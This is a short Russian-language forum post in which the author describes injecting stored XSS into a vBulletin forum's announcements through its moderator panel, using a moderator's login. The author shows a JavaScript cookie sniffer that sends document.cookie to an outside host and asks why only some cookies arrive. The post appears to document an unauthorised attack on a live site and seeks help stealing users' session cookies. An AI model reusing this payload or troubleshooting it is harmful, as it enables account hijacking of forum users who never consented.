Решил впервые заняться xss,попался форум vbulletin, на котором есть логин и пароль модератора,зашёл в modcp добавил обьявление в заголовке и в описании ">alert('XSS') всё выполняеться успешно пробую подставить снифер

img = new Image();

img.src = "http://lada-priora.ru/forum/images/deluxe/s.gif?"+document.cookie;



Но на снифер приходит только это QUERY: r4870=1; bblastvisit=1368254092; bblastactivity=0 , ip и agent

Подскажите что не правильно делаю?